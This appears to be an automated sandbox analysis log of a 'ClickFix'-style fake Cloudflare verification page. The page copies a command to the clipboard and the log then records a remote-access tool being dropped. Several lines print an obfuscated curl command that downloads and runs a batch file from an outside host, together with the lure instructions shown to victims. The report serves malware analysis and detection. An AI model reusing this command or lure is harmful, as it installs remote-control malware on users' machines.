Source: C:\Windows\explorer.exe	Section loaded: osksupport.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.fileexplorer.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uiribbon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: networkexplorer.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: storageusage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: fhcfg.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: efsutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.system.userprofile.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cloudexperiencehostbroker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: credui.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wpnapps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\tar.exe	Section loaded: archiveint.dll
Source: C:\Windows\System32\tar.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\tar.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: pcicl32.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: pcichek.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: pcicapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: nsmtrace.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: nslsp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: pcihooks.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: riched32.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: pciinv.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: firewallapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: fwbase.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll

Source: C:\Windows\System32\osk.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{29CE1D46-B481-4AA0-A08A-D3EBC8ACA402}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\tar.exe

File written: C:\Users\user\AppData\Roaming\Dire\NSM.ini

Source: C:\Users\user\AppData\Roaming\Dire\client32.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\Dire\client32.exe

File opened: C:\Users\user\AppData\Roaming\Dire\MSVCR100.dll

Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: PCICHEK.DLL.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: PCICL32.DLL.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000020.00000000.1486224969.00000000007C2000.00000002.00000001.01000000.0000000D.sdmp, client32.exe.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: pcicapi.dll.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.31.dr
Source:	Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb@ source: hw.dll.31.dr
Source:	Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb source: hw.dll.31.dr
Source:	Binary string: F:\project\delphi\itop\ipv6chek\Release\DllForIpv6.pdb source: pnf1.dll1.31.dr, pnf1.dll0.31.dr

Data Obfuscation

Obfuscated command line found

Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter

PE file contains sections with non-standard names

Source: libopus-0.dll.31.dr	Static PE information: section name: .xdata
Source: avutil-59.dll.31.dr	Static PE information: section name: .xdata
Source: libopus-0.dll0.31.dr	Static PE information: section name: .xdata
Source: avutil-59.dll0.31.dr	Static PE information: section name: .xdata
Source: libopus-0.dll1.31.dr	Static PE information: section name: .xdata
Source: avutil-59.dll1.31.dr	Static PE information: section name: .xdata
Source: PCICL32.DLL.31.dr	Static PE information: section name: .hhshare

Source: msvcr100.dll.31.dr

Static PE information: section name: .text entropy: 6.909044922675825

Persistence and Installation Behavior

Detect drive by download via clipboard copy & paste

Source: screenshot	OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below o Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Select 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below c Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:39 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Ctrl Fade Fn Ctrl Alt Options Help AltGr Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. Open: 0K Cancel Browse... Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below c Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard video visit value very Vla version View Visa PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Ctrl Fade Fn Ctrl Alt Options Help AltGr Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. Enter} Open: Browse... 0K Cancel Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below O Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY English (United Kingdom) Swiss German keyboard Ray 10: 4nkbyi8avf To switch input methods, press Performance and security by Cloudflare Windows key+Space. ENG 15:40 p Type here to search
Source: screenshot	OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Ctrl Fade Fn Ctrl Alt Options Help AltGr Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below o Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:39 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Move the cursor to where you want to enter text. Shift Shift Del ScrLk Dock PrtScn > Alt Ctrl Fade Fn Ctrl Options Help AltGr Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below O Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: about:blan Home Fountain of Health e In ey + ress 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG Type here to search SG 02/06/2025
Source: screenshot	OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Ctrl Fade Fn Ctrl Alt Options Help AltGr Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below o Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below c Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Hcme I Fcuntain cf Health - GccglE Chrcme Home I Fountain of Health - Gom by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause s Shift Shift Del ScrLk Dock PrtScn > AltGr Ctrl < Alt Fade Fn Ctrl Optidns Help Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below o Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY English (United Kingdom) Swiss German keyboard Ray 10: 4nkbyi8avf To switch input methods, press Performance and security by Cloudflare V,/inclcws key+Space. ENG 15:40 p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard video value visit very Vla version View Visa PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Ctrl Fade Fn Ctrl Alt Options Help AltGr Complete these verification steps Lise keyboard Clipboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Can't show history See all your copied items in one placel Turn on clipboard history naw. Turn on Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. " ramOata\cvcv.bat" Enter Browse... 0K Cancel Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot	OCR Text: about:blan Home Fountain of Health On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Alt Ctrl Fade Fn Ctrl Options Help AltGr e In ey + ress 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: Chrome DOM: 0.6	OCR Text: fountainofhealth.ca Verify you are human by completing the action below O Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps use keyboard To prove you are not robot 1, Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3, Press Enter key on your keyboard Ray 10: 4nkbyi8avf Performance and security by Cloudflare

HTML page adds supicious text to clipboard

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Clipboard modification: C:\WINDOWS\system32\conhost.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter

Drops PE files

Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\zojtai\libopus-0.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\zojtai\avutil-59.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\djalji\adtw.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\kustai\avutil-59.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\client32.exe	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\pcicapi.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\zojtai\pnf1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\HTCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\kustai\libopus-0.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\hw.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\djalji\avutil-59.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\djalji\pnf1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\kustai\pnf1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\kustai\adtw.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\zojtai\adtw.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	File created: C:\Users\user\AppData\Roaming\Dire\djalji\libopus-0.dll	Jump to dropped file

